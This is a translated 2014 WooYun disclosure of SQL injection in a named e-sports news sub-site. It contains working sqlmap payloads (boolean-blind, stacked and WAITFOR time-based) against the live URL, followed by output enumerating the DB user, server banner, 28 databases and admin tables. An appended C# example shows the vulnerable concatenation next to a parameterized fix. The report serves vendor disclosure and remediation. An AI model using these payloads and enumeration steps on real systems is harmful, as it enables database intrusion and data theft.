Vulnerability summary (24 followers)

Defect ID: wooyun-2014-077662

Title: SQL injection in a Haofang e-sports platform sub-site

Vendor: Bianfeng Network (边锋网络)

Author: xyang

Submitted: 2014-09-29 19:00

Fixed: 2014-11-13 19:02

Published: 2014-11-13 19:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2014-09-29: Details sent to the vendor, awaiting vendor response
2014-09-30: Vendor confirmed; details disclosed to the vendor only
2014-10-10: Details disclosed to core white hats and domain experts
2014-10-20: Details disclosed to regular white hats
2014-10-30: Details disclosed to intern white hats
2014-11-13: Details disclosed to the public

Brief description:

SQL injection in a sub-site of a large domestic e-sports platform

Detailed description:

I first played DOTA on Haofang :)
Vulnerable URL:

http://news.cga.com.cn/app/list.aspx?ItemId=13&categoryid=4


Injected parameters:

ItemID,categoryid


payload:

---
Place: GET
Parameter: ItemId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ItemId=13) AND 6213=6213 AND (2258=2258&categoryid=4
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ItemId=13); WAITFOR DELAY '0:0:5'--&categoryid=4
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ItemId=13) WAITFOR DELAY '0:0:5'--&categoryid=4
Place: GET
Parameter: categoryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ItemId=13&categoryid=4) AND 9641=9641 AND (4531=4531
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ItemId=13&categoryid=4); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ItemId=13&categoryid=4) WAITFOR DELAY '0:0:5'--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: categoryid, type: Unescaped numeric (default)
[1] place: GET, parameter: ItemId, type: Unescaped numeric
[q] Quit


Current database info:

[03:16:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[03:16:39] [INFO] fetching current user
[03:16:39] [INFO] resumed: UnionNewWebDBUser
current user: 'UnionNewWebDBUser'
[03:16:39] [INFO] fetching current database
[03:16:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:16:39] [INFO] retrieved:
[03:16:39] [WARNING] reflective value(s) found and filtering out
UnionNews
current database: 'UnionNews'


Server banner:

banner:
---
Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64)
Jun 17 2011 00:54:03
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
---


Enumerating databases:

available databases [28]:
[*] DntForum
[*] HF_Maps
[*] HF_Match
[*] HFActivity
[*] HFAwardSys
[*] HFClanSys
[*] HFEvent2013
[*] HFEvent2013Apr
[*] HFGoldenLeague
[*] HFHelpSys
[*] HFNetBar
[*] HFReportComplain
[*] HFWebApp
[*] HFZhanLing
[*] JDDB
[*] ManagementSystem
[*] master
[*] model
[*] msdb
[*] Nest
[*] pv
[*] QuestionnaireSys
[*] RencunBeckon
[*] RencunDIY
[*] RencunGift
[*] tempdb
[*] UnionNews
[*] Woool2WebDB


Enumerating tables:

[03:40:54] [INFO] retrieved: dbo.Admin
[03:41:25] [INFO] retrieved: dbo.Admin_Category
[03:42:05] [INFO] retrieved: dbo.Admin_Item
[03:42:29] [INFO] retrieved: dbo.Admin_Permission
[03:43:10] [INFO] retrieved: dbo.Admin_Tag
[03:43:28] [INFO] retrieved: dbo.Admin_Template
[03:44:04] [INFO] retrieved: dbo.AspNet_SqlCacheTablesForChangeNotification
[03:46:28] [INFO] retrieved: dbo.Category
[03:47:05] [INFO] retrieved: dbo.comd_list
[03:47:40] [INFO] retrieved: dbo.Item
[03:47:59] [INFO] retrieved: dbo.jiaozhu
[03:48:30] [INFO] retrieved: dbo.lunhui
[03:48:57] [INFO] retrieved: dbo.News
[03:49:18] [INFO] retrieved: dbo.News_Comment
[03:49:49] [INFO] retrieved: dbo.News_v
[03:50:00] [INFO] retrieved: dbo.Pic
[03:50:16] [INFO] retrieved: dbo.Reg_Arrt
[03:50:45] [INFO] retrieved: dbo.Tag
[03:51:01] [INFO] retrieved: dbo.Template
[03:51:29] [INFO] retrieved: dbo.Vote
[03:51:44] [INFO] retrieved: dbo.Vote_items
[03:52:13] [INFO] retrieved: dbo.Vote_logs
Database: UnionNews
[22 tables]
+--------------------------------------------+
| Admin |
| Admin_Category |
| Admin_Item |
| Admin_Permission |
| Admin_Tag |
| Admin_Template |
| AspNet_SqlCacheTablesForChangeNotification |
| Category |
| Item |
| News |
| News_Comment |
| News_v |
| Pic |
| Reg_Arrt |
| Tag |
| Template |
| Vote |
| Vote_items |
| Vote_logs |
| comd_list |
| jiaozhu |
| lunhui |
+--------------------------------------------+

Proof of vulnerability:

Lots of tables and I have no idea what they're for... Would digging further affect the platform's players? Very exciting, but I'll stop here.
I just want to know which school has the best excavator skills?

Fix:

Add type checking and filtering for the parameters.
:)
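The fix the report recommends, as an added ASP.NET/C# example that is not the site's code: the handler behind list.aspx is assumed to filter a table dbo.Item by the ItemId and categoryid parameters (table and column names are assumptions). The concatenated query that matches the sqlmap findings is shown beside a version that rejects anything but a plain positive integer and passes typed parameters, so the `) AND ...` and `); WAITFOR DELAY` inputs above are never parsed as SQL.

```csharp
// Added example, not the site's own code. Table dbo.Item and columns
// ItemId/CategoryId/Title/PubDate are assumptions based on the report's parameter names.
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Web;

public static class ItemListQuery
{
    // Vulnerable pattern matching the report: query string values are pasted into the
    // SQL text, so "13) AND 6213=6213 AND (2258=2258" becomes part of the statement.
    public static DataTable ListVulnerable(SqlConnection conn, HttpRequest req)
    {
        string sql = "SELECT Title, PubDate FROM dbo.Item WHERE (ItemId = "
                   + req.QueryString["ItemId"] + " AND CategoryId = "
                   + req.QueryString["categoryid"] + ")";
        using (var da = new SqlDataAdapter(sql, conn))
        {
            var table = new DataTable(); da.Fill(table); return table;
        }
    }

    // Type check: only a plain string of digits is accepted (no sign, no
    // whitespace, no ')', ';' or comment markers), and it must be positive.
    public static bool TryParseId(string raw, out int id)
    {
        return int.TryParse(raw, NumberStyles.None, CultureInfo.InvariantCulture, out id)
               && id > 0;
    }

    // Hardened form: reject bad input with a 400 before any SQL is built, and
    // send the values as typed parameters so the server never parses them as SQL.
    public static DataTable ListHardened(SqlConnection conn, HttpRequest req)
    {
        int itemId, categoryId;
        if (!TryParseId(req.QueryString["ItemId"], out itemId) ||
            !TryParseId(req.QueryString["categoryid"], out categoryId))
            throw new HttpException(400, "ItemId and categoryid must be positive integers");
        const string sql = "SELECT Title, PubDate FROM dbo.Item "
                         + "WHERE ItemId = @ItemId AND CategoryId = @CategoryId";
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@ItemId", SqlDbType.Int).Value = itemId;
            cmd.Parameters.Add("@CategoryId", SqlDbType.Int).Value = categoryId;
            var table = new DataTable(); da.Fill(table); return table;
        }
    }
}
```

The report also shows the application's database login (UnionNewWebDBUser) able to list 28 databases, so beyond the parameter fix the account's permissions are worth reviewing.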

Copyright notice: when reposting, please credit the source: xyang@WooYun


Vulnerability responses

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-09-30 08:52

Vendor reply:

Thanks to xyang for the vulnerability.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-09-29 10:22 | hkAssassin (Regular white hat | Rank: 358 Vulnerabilities: 66 | I am a caterpillar.)

    So that's how my CS account got stolen. Finally found you...